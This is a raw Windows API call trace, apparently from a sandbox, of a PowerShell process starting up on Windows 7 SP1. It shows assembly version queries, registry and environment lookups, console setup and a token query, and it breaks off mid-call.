GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d960 | out: lpFileInformation=0x12d960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0064.954] SetErrorMode (uMode=0x1) returned 0x1 [0064.954] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dbd0 | out: lpdwHandle=0x12dbd0) returned 0x94c [0064.955] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d05328 | out: lpData=0x2d05328) returned 1 [0064.956] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db48, puLen=0x12db40 | out: lplpBuffer=0x12db48*=0x2d053c4, puLen=0x12db40) returned 1 [0064.956] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d054a0, puLen=0x12dab0) returned 1 [0064.956] lstrlenW (lpString="Microsoft Corporation") returned 21 [0064.956] CoTaskMemAlloc (cb=0x2e) returned 0x2c2f80 [0064.956] lstrcpyW (in: lpString1=0x2c2f80, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0064.957] CoTaskMemFree (pv=0x2c2f80) [0064.957] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d054f4, puLen=0x12dab0) returned 1 [0064.957] lstrlenW (lpString="System.Management.Automation") returned 28 [0064.957] CoTaskMemAlloc (cb=0x3c) returned 0x2c4340 [0064.957] lstrcpyW (in: lpString1=0x2c4340, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0064.957] CoTaskMemFree (pv=0x2c4340) [0064.957] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d05550, puLen=0x12dab0) returned 1 [0064.957] lstrlenW (lpString="6.1.7601.17514") returned 14 [0064.957] CoTaskMemAlloc (cb=0x20) returned 0x2c9c50 [0064.957] lstrcpyW (in: lpString1=0x2c9c50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0064.957] CoTaskMemFree (pv=0x2c9c50) [0064.957] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d05590, puLen=0x12dab0) returned 1 [0064.957] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0064.957] CoTaskMemAlloc (cb=0x44) returned 0x2c4340 [0064.957] lstrcpyW (in: lpString1=0x2c4340, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0064.957] CoTaskMemFree (pv=0x2c4340) [0064.957] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d055f8, puLen=0x12dab0) returned 1 [0064.957] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0064.957] CoTaskMemAlloc (cb=0x76) returned 0x2696e0 [0064.957] lstrcpyW (in: lpString1=0x2696e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0064.957] CoTaskMemFree (pv=0x2696e0) [0064.957] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d05694, puLen=0x12dab0) returned 1 [0064.957] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0064.957] CoTaskMemAlloc (cb=0x44) returned 0x2c4340 [0064.957] lstrcpyW (in: lpString1=0x2c4340, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0064.957] CoTaskMemFree (pv=0x2c4340) [0064.957] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d056f8, puLen=0x12dab0) returned 1 [0064.957] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0064.957] CoTaskMemAlloc (cb=0x58) returned 0x22ede0 [0064.958] lstrcpyW (in: lpString1=0x22ede0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0064.958] CoTaskMemFree (pv=0x22ede0) [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d05774, puLen=0x12dab0) returned 1 [0064.958] lstrlenW (lpString="6.1.7601.17514") returned 14 [0064.958] CoTaskMemAlloc (cb=0x20) returned 0x2c9c50 [0064.958] lstrcpyW (in: lpString1=0x2c9c50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0064.958] CoTaskMemFree (pv=0x2c9c50) [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d0541c, puLen=0x12dab0) returned 1 [0064.958] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0064.958] CoTaskMemAlloc (cb=0x66) returned 0x23eb10 [0064.958] lstrcpyW (in: lpString1=0x23eb10, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0064.958] CoTaskMemFree (pv=0x23eb10) [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x0, puLen=0x12dab0) returned 0 [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x0, puLen=0x12dab0) returned 0 [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x0, puLen=0x12dab0) returned 0 [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12da88, puLen=0x12da80 | out: lplpBuffer=0x12da88*=0x2d053c4, puLen=0x12da80) returned 1 [0064.958] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0064.958] VerLanguageNameW (in: wLang=0x0, szLang=0x282650, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0064.958] CoTaskMemFree (pv=0x282650) [0064.958] VerQueryValueW (in: pBlock=0x2d05328, lpSubBlock="\\", lplpBuffer=0x12dad8, puLen=0x12dad0 | out: lplpBuffer=0x12dad8*=0x2d05350, puLen=0x12dad0) returned 1 [0064.966] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0064.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.966] CoTaskMemFree (pv=0x22fde0) [0064.970] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0064.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0064.970] CoTaskMemFree (pv=0x22fde0) [0064.974] lstrlenW (lpString="䅁") returned 1 [0064.984] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d9a8 | out: phkResult=0x12d9a8*=0x314) returned 0x0 [0064.986] RegOpenKeyExW (in: hKey=0x314, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d998 | out: phkResult=0x12d998*=0x318) returned 0x0 [0064.986] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da28 | out: phkResult=0x12da28*=0x31c) returned 0x0 [0064.989] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d96c, lpData=0x0, lpcbData=0x12d968*=0x0 | out: lpType=0x12d96c*=0x1, lpData=0x0, lpcbData=0x12d968*=0x56) returned 0x0 [0064.990] CoTaskMemAlloc (cb=0x5a) returned 0x23ec60 [0064.990] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d93c, lpData=0x23ec60, lpcbData=0x12d938*=0x56 | out: lpType=0x12d93c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d938*=0x56) returned 0x0 [0064.990] CoTaskMemFree (pv=0x23ec60) [0064.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0064.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.022] CoTaskMemAlloc (cb=0x104) returned 0x22fde0 [0065.022] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.022] CoTaskMemFree (pv=0x22fde0) [0065.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0065.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0065.375] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.375] CoTaskMemFree (pv=0x22fef0) [0065.377] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.377] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.377] CoTaskMemFree (pv=0x22fef0) [0065.416] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.416] CoTaskMemFree (pv=0x22fef0) [0065.418] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.418] CoTaskMemFree (pv=0x22fef0) [0065.418] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.418] CoTaskMemFree (pv=0x22fef0) [0065.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0065.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0065.590] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.591] CoTaskMemFree (pv=0x22fef0) [0065.594] CoTaskMemAlloc (cb=0x104) returned 0x22fef0 [0065.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x22fef0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.595] CoTaskMemFree (pv=0x22fef0) [0065.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0066.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0066.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0066.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0066.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0066.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0066.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0066.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0066.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0066.611] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0066.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.612] CoTaskMemFree (pv=0x230110) [0066.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0066.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0066.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0066.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0066.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0066.647] SetErrorMode (uMode=0x1) returned 0x1 [0066.647] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12d900 | out: lpFileInformation=0x12d900*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.647] SetErrorMode (uMode=0x1) returned 0x1 [0067.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0067.004] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.004] CoTaskMemFree (pv=0x230110) [0067.007] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.008] CoTaskMemFree (pv=0x230110) [0067.008] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.008] CoTaskMemFree (pv=0x230110) [0067.011] CoCreateGuid (in: pguid=0x12dcc8 | out: pguid=0x12dcc8*(Data1=0xc357cadb, Data2=0xb98a, Data3=0x4fa3, Data4=([0]=0x90, [1]=0x4a, [2]=0x39, [3]=0x26, [4]=0x82, [5]=0x2e, [6]=0xd2, [7]=0xe5))) returned 0x0 [0067.016] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.016] CoTaskMemFree (pv=0x230110) [0067.020] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.020] CoTaskMemFree (pv=0x230110) [0067.023] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0067.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.023] CoTaskMemFree (pv=0x230110) [0067.029] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0067.031] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12d970 | out: lpConsoleScreenBufferInfo=0x12d970) returned 1 [0067.036] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0067.036] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d970 | out: lpConsoleScreenBufferInfo=0x12d970) returned 1 [0067.037] GetVersionExW (in: lpVersionInformation=0x12d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0067.040] GetCurrentProcess () returned 0xffffffffffffffff [0067.041] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12d998 | out: TokenHandle=0x12d998*=0x330) returned 1 [0067.044] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, 